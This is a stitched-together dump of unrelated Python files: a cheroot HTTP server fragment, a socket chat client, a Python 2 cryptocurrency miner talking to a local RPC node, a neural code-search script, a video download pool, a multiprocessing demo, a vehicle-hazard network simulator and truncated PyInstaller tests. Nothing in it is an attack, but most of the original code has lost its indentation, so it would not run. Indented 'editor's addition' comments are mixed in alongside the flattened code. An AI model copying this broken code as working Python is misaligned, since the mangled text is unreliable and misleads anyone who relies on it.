if conn:
try:
self.requests.put(conn)
except queue.Full:
# Just drop the conn. TODO: write 503 back?
conn.close()
self.connections.expire()
@property
def interrupt(self):
"""Flag interrupt of the server."""
return self._interrupt
@interrupt.setter
def interrupt(self, interrupt):
"""Perform the shutdown of this server and save the exception."""
self._interrupt = True
self.stop()
self._interrupt = interrupt
if self._interrupt:
raise self.interrupt
def stop(self): # noqa: C901 # FIXME
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
# ensure serve is no longer accessing socket, connections
while self.serving:
time.sleep(0.1)
sock = getattr(self, 'socket', None)
if sock:
if not isinstance(
self.bind_addr,
(six.text_type, six.binary_type),
):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
# Changed to use error code and not message
# See
# https://github.com/cherrypy/cherrypy/issues/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM,
):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See
# https://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, 'close'):
sock.close()
self.socket = None
self.connections.close()
self.requests.stop(self.shutdown_timeout)
class Gateway:
"""Base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
"""Initialize Gateway instance with request.
Args:
req (HTTPRequest): current HTTP request
"""
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplementedError # pragma: no cover
# These may either be ssl.Adapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cheroot.ssl.builtin.BuiltinSSLAdapter',
'pyopenssl': 'cheroot.ssl.pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, six.string_types):
last_dot = adapter.rfind('.')
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError(
"'%s' object has no attribute '%s'"
% (mod_path, attr_name),
)
return adapter
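# --- Hedged usage sketch (editor's addition, not part of the upstream module) ---
# It shows how get_ssl_adapter_class() and HTTPServer fit together. The
# certificate/key paths below are hypothetical placeholders, and the base
# Gateway only raises NotImplementedError from respond(), so a real deployment
# would plug in a concrete gateway (e.g. a WSGI gateway) instead.
if __name__ == '__main__':
    # Resolve the built-in TLS adapter lazily by its registered name.
    adapter_cls = get_ssl_adapter_class('builtin')
    # Gateway is passed as a class; the server machinery instantiates it per request.
    demo_server = HTTPServer(('0.0.0.0', 8443), gateway=Gateway)
    demo_server.ssl_adapter = adapter_cls(
        'server.crt',  # hypothetical certificate path
        'server.key',  # hypothetical private-key path
    )
    # safe_start() runs the accept loop and stops cleanly on Ctrl-C / SystemExit.
    demo_server.safe_start()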
|
client.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread, Lock
import time
class Client:
"""
    Client for communicating with the chat server over a TCP socket.
"""
HOST = "192.168.1.4"
PORT = 5500
ADDR = (HOST, PORT)
BUFSIZ = 512
def __init__(self, name):
"""
Init object and send name to server
:param name: str
"""
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect(self.ADDR)
        self.messages = []
        # create the lock before starting the receiver thread, which uses it
        self.lock = Lock()
        receive_thread = Thread(target=self.receive_messages)
        receive_thread.start()
        self.send_message(name)
def receive_messages(self):
"""
receive messages from server
:return: None
"""
while True:
try:
msg = self.client_socket.recv(self.BUFSIZ).decode()
# make sure memory is safe to access
self.lock.acquire()
self.messages.append(msg)
self.lock.release()
except Exception as e:
print("[EXCPETION]", e)
break
def send_message(self, msg):
"""
send messages to server
:param msg: str
:return: None
"""
try:
self.client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
self.client_socket.close()
except Exception as e:
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect(self.ADDR)
print(e)
def get_messages(self):
"""
        Return the messages received since the last call and clear the buffer.
        :return: list[str]
        """
        # copy and clear under the lock so no message is lost to a concurrent append
        self.lock.acquire()
        messages_copy = self.messages[:]
        self.messages = []
        self.lock.release()
return messages_copy
def disconnect(self):
self.send_message("{quit}")
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Copyright (c) 2014 Joey Krug and Jack Peterson
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class SidecoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
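# e.g. bytereverse(0x12345678) == 0x78563412 -- the byte order within a 32-bit word is reversed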
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = SidecoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
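# --- Example CONFIG-FILE (editor's addition) ---
# The parser above accepts "key = value" lines and skips "#" comments, so a
# minimal configuration file could look like this (all values are placeholders):
#
#   host = 127.0.0.1
#   port = 8332
#   threads = 2
#   hashmeter = 1
#   scantime = 30
#   rpcuser = myrpcuser
#   rpcpass = myrpcpassword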
|
search.py
|
import os
import sys
import traceback
import numpy as np
import argparse
import threading
import codecs
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(message)s")
from tensorboardX import SummaryWriter # install tensorboardX (pip install tensorboardX) before importing this package
import torch
from utils import normalize, similarity, sent2indexes
from data_loader import load_dict, load_vecs
import models, configs
codevecs, codebase = [], []
##### Data Set #####
def load_codebase(code_path, chunk_size=2000000):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info(f'Loading codebase (chunk size={chunk_size})..')
codebase= []
codes = codecs.open(code_path, encoding='latin-1').readlines() # use codecs to read in case of encoding problem
for i in range(0, len(codes), chunk_size):
codebase.append(codes[i: i+chunk_size])
'''
import subprocess
n_lines = int(subprocess.check_output(["wc", "-l", code_path], universal_newlines=True).split()[0])
for i in range(1, n_lines+1, chunk_size):
codecs = subprocess.check_output(["sed",'-n',f'{i},{i+chunk_size}p', code_path]).split()
codebase.append(codecs)
'''
return codebase
### Results Data ###
def load_codevecs(vec_path, chunk_size=2000000):
    """Read code vectors (2D numpy arrays) from chunked hdf5 files."""
    logger.debug(f'Loading code vectors (chunk size={chunk_size})..')
codevecs=[]
chunk_id = 0
chunk_path = f"{vec_path[:-3]}_part{chunk_id}.h5"
while os.path.exists(chunk_path):
reprs = load_vecs(chunk_path)
codevecs.append(reprs)
chunk_id+=1
chunk_path = f"{vec_path[:-3]}_part{chunk_id}.h5"
return codevecs
def search(config, model, vocab, query, n_results=10):
model.eval()
device = next(model.parameters()).device
    desc, desc_len = sent2indexes(query, vocab, config['desc_len'])  # convert the query into word indices
desc = torch.from_numpy(desc).unsqueeze(0).to(device)
desc_len = torch.from_numpy(desc_len).clamp(max=config['desc_len']).to(device)
with torch.no_grad():
desc_repr = model.desc_encoding(desc, desc_len).data.cpu().numpy().astype(np.float32) # [1 x dim]
if config['sim_measure']=='cos': # normalizing vector for fast cosine computation
desc_repr = normalize(desc_repr) # [1 x dim]
results =[]
threads = []
for i, codevecs_chunk in enumerate(codevecs):
t = threading.Thread(target=search_thread, args = (results, desc_repr, codevecs_chunk, i, n_results, config['sim_measure']))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads have completed
t.join()
return results
def search_thread(results, desc_repr, codevecs, i, n_results, sim_measure):
#1. compute code similarities
    if sim_measure == 'cos':
chunk_sims = np.dot(codevecs, desc_repr.T)[:,0] # [pool_size]
else:
chunk_sims = similarity(codevecs, desc_repr, sim_measure) # [pool_size]
#2. select the top K results
negsims = np.negative(chunk_sims)
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes = [codebase[i][k] for k in maxinds]
chunk_sims = chunk_sims[maxinds]
results.extend(zip(chunk_codes, chunk_sims))
def postproc(codes_sims):
codes_, sims_ = zip(*codes_sims)
codes = [code for code in codes_]
sims = [sim for sim in sims_]
final_codes = []
final_sims = []
n = len(codes_sims)
for i in range(n):
is_dup=False
for j in range(i):
if codes[i][:80]==codes[j][:80] and abs(sims[i]-sims[j])<0.01:
is_dup=True
if not is_dup:
final_codes.append(codes[i])
final_sims.append(sims[i])
return zip(final_codes,final_sims)
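# Example of the dedup rule above (editor's note): two results whose first 80
# characters of code are identical and whose similarity scores differ by less
# than 0.01 are treated as duplicates, and only the earlier one is kept, e.g.
#   [("def add(a, b): ...", 0.912), ("def add(a, b): ...", 0.909)] -> one entry survives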
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument('--data_path', type=str, default='./data/', help='location of the data corpus')
parser.add_argument('--model', type=str, default='JointEmbeder', help='model name')
parser.add_argument('-d', '--dataset', type=str, default='github', help='name of dataset.java, python')
parser.add_argument('--reload_from', type=int, default=-1, help='step to reload from')
parser.add_argument('--chunk_size', type=int, default=2000000, help='codebase and code vector are stored in many chunks. '\
'Note: should be consistent with the same argument in the repr_code.py')
parser.add_argument('-g', '--gpu_id', type=int, default=0, help='GPU ID')
parser.add_argument('-v', "--visual",action="store_true", default=False, help="Visualize training status in tensorboard")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
device = torch.device(f"cuda:{args.gpu_id}" if torch.cuda.is_available() else "cpu")
config = getattr(configs, 'config_'+args.model)()
##### Define model ######
logger.info('Constructing Model..')
model = getattr(models, args.model)(config)#initialize the model
ckpt=f'./output/{args.model}/{args.dataset}/models/step{args.reload_from}.h5'
model.load_state_dict(torch.load(ckpt, map_location=device))
data_path = args.data_path+args.dataset+'/'
vocab_desc = load_dict(data_path+config['vocab_desc'])
codebase = load_codebase(data_path+config['use_codebase'], args.chunk_size)
codevecs = load_codevecs(data_path+config['use_codevecs'], args.chunk_size)
assert len(codebase)==len(codevecs), \
"inconsistent number of chunks, check whether the specified files for codebase and code vectors are correct!"
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
query = query.lower().replace('how to ', '').replace('how do i ', '').replace('how can i ', '').replace('?', '').strip()
results = search(config, model, vocab_desc, query, n_results)
results = sorted(results, reverse=True, key=lambda x:x[1])
results = postproc(results)
results = list(results)[:n_results]
results = '\n\n'.join(map(str,results)) #combine the result into a returning string
print(results)
|
parallel_download.py
|
import os
from multiprocessing import Process, Queue
import lib.downloader as downloader
class Pool:
"""
A pool of video downloaders.
"""
def __init__(self, classes, videos_dict, directory, num_workers, failed_save_file, compress, verbose, skip,
log_file=None):
"""
:param classes: List of classes to download.
:param videos_dict: Dictionary of all videos.
        :param directory: Where to download the videos to.
:param num_workers: How many videos to download in parallel.
:param failed_save_file: Where to save the failed videos ids.
:param compress: Whether to compress the videos using gzip.
"""
self.classes = classes
self.videos_dict = videos_dict
self.directory = directory
self.num_workers = num_workers
self.failed_save_file = failed_save_file
self.compress = compress
self.verbose = verbose
self.skip = skip
self.log_file = log_file
self.videos_queue = Queue(100)
self.failed_queue = Queue(100)
self.workers = []
self.failed_save_worker = None
if verbose:
print("downloading:")
if self.classes is not None:
for cls in self.classes:
print(cls)
print()
def feed_videos(self):
"""
Feed video ids into the download queue.
:return: None.
"""
if self.classes is None:
downloader.download_class_parallel(None, self.videos_dict, self.directory, self.videos_queue)
else:
for class_name in self.classes:
if self.verbose:
print(class_name)
class_path = os.path.join(self.directory, class_name.replace(" ", "_"))
if not self.skip or not os.path.isdir(class_path):
downloader.download_class_parallel(class_name, self.videos_dict, self.directory, self.videos_queue)
if self.verbose:
print("done")
def start_workers(self):
"""
Start all workers.
:return: None.
"""
# start failed videos saver
if self.failed_save_file is not None:
self.failed_save_worker = Process(target=write_failed_worker, args=(self.failed_queue, self.failed_save_file))
self.failed_save_worker.start()
# start download workers
for _ in range(self.num_workers):
worker = Process(target=video_worker, args=(self.videos_queue, self.failed_queue, self.compress, self.log_file))
worker.start()
self.workers.append(worker)
def stop_workers(self):
"""
Stop all workers.
:return: None.
"""
# send end signal to all download workers
for _ in range(len(self.workers)):
self.videos_queue.put(None)
# wait for the processes to finish
for worker in self.workers:
worker.join()
# end failed videos saver
if self.failed_save_worker is not None:
self.failed_queue.put(None)
self.failed_save_worker.join()
def video_worker(videos_queue, failed_queue, compress, log_file):
"""
    Downloads videos passed in via the videos queue.
    :param videos_queue: Queue of metadata for videos to be downloaded.
:param failed_queue: Queue of failed video ids.
:param compress: Whether to compress the videos using gzip.
:param log_file: Path to a log file for youtube-dl.
:return: None.
"""
while True:
request = videos_queue.get()
if request is None:
break
video_id, directory, start, end = request
if not downloader.process_video(video_id, directory, start, end, compress=compress, log_file=log_file):
failed_queue.put(video_id)
def write_failed_worker(failed_queue, failed_save_file):
"""
Write failed video ids into a file.
:param failed_queue: Queue of failed video ids.
    :param failed_save_file: Where to save the failed video ids.
:return: None.
"""
file = open(failed_save_file, "a")
while True:
video_id = failed_queue.get()
if video_id is None:
break
file.write("{}\n".format(video_id))
file.close()
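# --- Hedged usage sketch (editor's addition) ---
# The shape of videos_dict and the behaviour of lib.downloader are assumed
# here; the values below are placeholders purely to show the Pool lifecycle.
if __name__ == "__main__":
    pool = Pool(
        classes=["juggling"],       # hypothetical class label
        videos_dict={},             # normally loaded from the dataset metadata
        directory="downloads",
        num_workers=4,
        failed_save_file="failed.txt",
        compress=False,
        verbose=True,
        skip=True,
    )
    pool.start_workers()   # spawn downloader processes and the failed-id writer
    pool.feed_videos()     # enqueue download requests for the selected classes
    pool.stop_workers()    # send sentinels and join all workers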
|
mp_temp.py
|
import multiprocessing as mp
import os
class cl:
def __init__(self):
self.x = 1
def set(self):
self.x = os.getpid()
def __str__(self):
return str(self.x)
def run(a):
a.set()
print("Current pid, ", os.getpid(), a)
print(a)
if __name__ == "__main__":
a = cl()
print("Current pid", os.getpid())
p = mp.Process(target=run, args=(a,))
p.start()
p.join()
print(a)
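# Expected behaviour (editor's note): the child process receives a pickled copy
# of `a`, so run() sets x to the child's pid and prints it only there, while the
# parent's final print(a) still shows 1 -- plain objects are not shared across
# processes. Use multiprocessing.Manager or shared memory if the parent needs to
# observe the child's change.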
|
Post_MainEnvironmentSimulator.py
|
#Post_MainEnvironmentSimulator.py
#Environment simulator + REST-Server + AdvantEDGE
#Version:4
#Date:2020-04-14
#Author: Jaime Burbano
#Description: This set of files are used to run the first simulation of the system using AdvantEDGE
#runs with python 3
#python3 MainEnvironmentSimulator v001
import argparse
import threading
import time
import queue
from datetime import datetime
import ScenarioReader #reads the variables of the scenario
import VehicleMovemenManager as movement #Converts the speed of the car to X ms/s
import HazardManager
import PoAManager#Manages the change of PoA
import logging
#import RestClientSingle as RESTclient #Interacts with the REST-Server #UNCOMMENT to use single server approach
import RestClientWindow as RESTclient #Interacts with the REST-Server #UNCOMMENT to use Window approach
#Receives as an argument the ID of the vehicle
parser = argparse.ArgumentParser()
parser.add_argument("Vehicle_ID", help="type the vehicle ID (V001,V002...)")
args = parser.parse_args()
App_ID=args.Vehicle_ID #the given Vehicle ID must match with the one of the scenario
#Configuration of the logging file
log_path='/home/jaime/Desktop/code/AdvantEDGE/2020-04-11/code/HNA_Individual_Test_Case/loggers/'
log_file_name='HNA_TC1_TEST.log'
log_file=log_path+log_file_name
logging.basicConfig(level=logging.INFO, filename=log_file, filemode='a', format='%(name)s - %(levelname)s - %(message)s')
"""
SCRIPT VARIABLES
"""
end_flag=1 #Determines when to finish the simulation
synch_delay=1#time to wait in minutes before running the script in order to synch all the clients
detection_range=1 #The detection range in meters in which the car can detect a hazard
simulation_speed=10 #determines the speed of the vehicle in ms. This value must match with the time.sleep of the movement thread
hazard_generator=['equidistant',20] #sets how to create the hazard and the separation distance
"""
QUEUE DECLARATION
"""
q_hazard = queue.Queue() #Queue used to send data from the movement thread to the hazard publisher thread
q_PoA = queue.LifoQueue() #Queue used to notify the thread_PoA_change
"""
SETTING THE SYSTEM
"""
my_car_info=ScenarioReader.car_info(App_ID)
my_poa_info=ScenarioReader.poa_info()
vehicle_speed=my_car_info.get_vehicle_speed()
vehicle_init_pos= my_car_info.get_car_initPosition()
max_Distance=my_poa_info.get_coverage_area()
number_APs= my_poa_info.get_number_APs()
myPoA_manager=PoAManager.PoA_Manager(max_Distance,number_APs ) #creates an object of the PoA_Manager class
my_hazard_generator=HazardManager.hazard_generator(max_Distance,vehicle_speed,vehicle_init_pos) #coverage_area,car_speed,car_init_position
print ('generating list by equidistant distance')
my_hazard_generator.generate_hazard_list(hazard_generator[0],hazard_generator[1])
my_hazard_detector=HazardManager.hazard_detector()
#print ("simulating scenario for vehicle:" , App_ID)
#print ("vehicle_speed: ",vehicle_speed )
#print ("vehicle_init_pos: ", vehicle_init_pos )
#print ("max_Distance: ", max_Distance )
#print ("number_APs: ",number_APs )
"""
REGISTERING THE VEHICLE AND SETTING THE SCENARIO
"""
print("poA limits: ", myPoA_manager.get_coord_coverage()) #show the coverage area of the PoA defined in the scenario file
print ("the PoA is: ", myPoA_manager.Determine_AP (vehicle_init_pos)) #shows the PoA where the vehicle is connected initially
myPoA_manager.change_PoA(App_ID, myPoA_manager.Determine_AP (vehicle_init_pos)) #call mobility event on AdvantEDGE
#to move the vehicle to the initial PoA before starting with the simulation
#--------------------------------------------------------------
#FUNCTIONS
#--------------------------------------------------------------
#Thread to control the movement of the vehicle
def thread_vehicle_movement(vehicle_ID, vehicle_init_pos, vehicle_speed):
global end_flag
global actual_position_car
global a1
c=0
    a0=1 #previous PoA, used to detect when the PoA changes
    a1=1 #current PoA, used to detect when the PoA changes
m_Xms=movement.speed_m_mseg(vehicle_speed,simulation_speed) #Change the 2nd parameter to the number of ms
actual_position_car=vehicle_init_pos
while True:
start=time.time()
#determine if the simulation must be finished
if actual_position_car> max_Distance:
print ('---------simulation finished---------')
end_flag=0 #sets the flag to close the main file also
break
a1=myPoA_manager.Determine_AP (actual_position_car) #Determine current PoA
        if a1!=a0: #Execute only when the current AP differs from the previous one
q_PoA.put(a1) #Call change of PoA thread
a0=a1 #Update value of the last registered AP
if my_hazard_detector.detect_hazard(actual_position_car,detection_range):
            q_hazard.put(actual_position_car) #Call RESTClient thread
actual_position_car=actual_position_car+m_Xms #moves the car with real speed each Xms
        #TODO: make sure the complete loop takes 10ms --> use waitUntil
time.sleep(0.01) #should be 10ms --> make sure it is always the same
end=time.time()
#print ("time: ", end-start)
#Thread to trigger the AP switching
def thread_PoA_change(vehicle_ID):
global end_flag
while True:
PoA=q_PoA.get()
        myPoA_manager.change_PoA(vehicle_ID, PoA) #call mobility event on AdvantEDGE
if end_flag==0:
break
time.sleep(0.01)
def thread_hazard_notifier(vehicle_ID):
global counter_hazard
global end_flag
global a1
sequence_number=-1#to put a number to the hazard to be posted
while True:
sequence_number+=1
actual_position_car = q_hazard.get() #get the position of the car when it detected the hazard
h_location=actual_position_car
h_type="TT" #just to test the type of hazard detected
id_hazard= vehicle_ID+ "-"+str(sequence_number) #to show the ID of the car that has detected the hazard
posting_time=time.time() #take the time before posting
print ("hazard: ", h_location, "number:", sequence_number )
#-->POST HAZARD TO SERVER
RESTclient.post_hazard (id_hazard,"00", h_type, h_location,a1) #also a1 to send poA
#end_posting_time=time.time()
#print("time: ", end_posting_time-posting_time)
logging.info("*{'V_ID':'%s','det_time':'%s','h_ID':'%s','type':'%s', 'location':%s}",vehicle_ID, posting_time,id_hazard, h_type, h_location)
if end_flag==0:
break
time.sleep(0.01)
#--------------------------------------------------------------
#MAIN
#--------------------------------------------------------------
if __name__ == "__main__":
#SET HERE THE START TIME OF THE SIMULATION --> 2 MINUTES AFTER THE ACTUAL TIME
a = datetime.now()
actual_time= datetime.now().minute
if actual_time==59:
d= datetime(datetime.now().year, datetime.now().month, datetime.now().day,datetime.now().hour+1 ,0)
else:
execution_time = actual_time+synch_delay
d= datetime(datetime.now().year, datetime.now().month, datetime.now().day,datetime.now().hour ,execution_time)
print("init time: ",d )
while True: #stays in the loop until the program must start
a = datetime.now()
if d<=a :
print (a,"---------POSTER------------", d )
break
time.sleep(0.001)
#STARTING ALL THREADS
x0_vehicle_movement = threading.Thread(target=thread_vehicle_movement, args=(App_ID,vehicle_init_pos,vehicle_speed))
x0_vehicle_movement.daemon = True
x0_vehicle_movement.start()
x0_hazard_notifier = threading.Thread(target=thread_hazard_notifier, args=(App_ID,))
x0_hazard_notifier.daemon = True
x0_hazard_notifier.start()
x0_PoA_change = threading.Thread(target=thread_PoA_change, args=(App_ID,))
x0_PoA_change.daemon = True
x0_PoA_change.start()
while True:
if end_flag==0:
break
time.sleep(0.2)
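# Architecture note (editor's addition): thread_vehicle_movement is the producer;
# it advances the simulated position every tick, pushes detected hazard positions
# into q_hazard (consumed by thread_hazard_notifier, which POSTs them to the REST
# server) and PoA changes into q_PoA (consumed by thread_PoA_change, which triggers
# the AdvantEDGE mobility event). The main thread only waits for end_flag, which
# the movement thread sets to 0 once the vehicle leaves the coverage area.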
|
test_basic.py
|
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Library imports
# ---------------
import locale
import os
import sys
# Third-party imports
# -------------------
import pytest
# Local imports
# -------------
from PyInstaller.compat import is_darwin, is_win, is_py37
from PyInstaller.utils.tests import importorskip, skipif, skipif_win, \
skipif_winorosx, skipif_notwin, skipif_notosx, skipif_no_compiler, \
skipif_notlinux, xfail
def test_run_from_path_environ(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py', run_from_path=True)
@skipif_winorosx
def test_absolute_ld_library_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_ld_library_path.py')
def test_absolute_python_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py')
@skipif_notlinux
@skipif(not os.path.exists('/proc/self/status'),
reason='/proc/self/status does not exist')
@pytest.mark.parametrize("symlink_name",
["symlink",
"very_long_name_in_symlink",
"sub/dir/progam"])
def test_symlink_basename_is_kept(pyi_builder_spec, symlink_name,
tmpdir, SPEC_DIR, SCRIPT_DIR):
def patch(spec_name, symlink_name):
content = SPEC_DIR.join(spec_name).read_text(encoding="utf-8")
content = content.replace("@SYMLINKNAME@", symlink_name)
content = content.replace("@SCRIPTDIR@", str(SCRIPT_DIR))
outspec = tmpdir.join(spec_name)
outspec.write_text(content, encoding="utf-8", ensure=True)
return outspec
specfile = patch("symlink_basename_is_kept.spec", symlink_name)
pyi_builder_spec.test_spec(str(specfile), app_name=symlink_name)
def test_pyz_as_external_file(pyi_builder, monkeypatch):
# This tests the not well documented and seldom used feature of
# having the PYZ-archive in a separate file (.pkg).
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = False
return EXE(*args, **kwargs)
# :todo: find a better way to not even run this test in onefile-mode
if pyi_builder._mode == 'onefile':
pytest.skip('only --onedir')
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("print('Hello Python!')")
def test_base_modules_regex(pyi_builder):
"""
Verify that the regex for excluding modules listed in
PY3_BASE_MODULES does not exclude other modules.
"""
pyi_builder.test_source(
"""
import resources_testmod
print('OK')
""")
def test_celementtree(pyi_builder):
pyi_builder.test_source(
"""
from xml.etree.cElementTree import ElementTree
print('OK')
""")
# Test a build with some complexity with the ``noarchive`` debug option.
def test_noarchive(pyi_builder):
pyi_builder.test_source("from xml.etree.cElementTree import ElementTree",
pyi_args=['--debug=noarchive'])
@importorskip('codecs')
def test_codecs(pyi_builder):
pyi_builder.test_script('pyi_codecs.py')
def test_compiled_filenames(pyi_builder):
pyi_builder.test_source("""
import pyi_dummy_module
from os.path import isabs
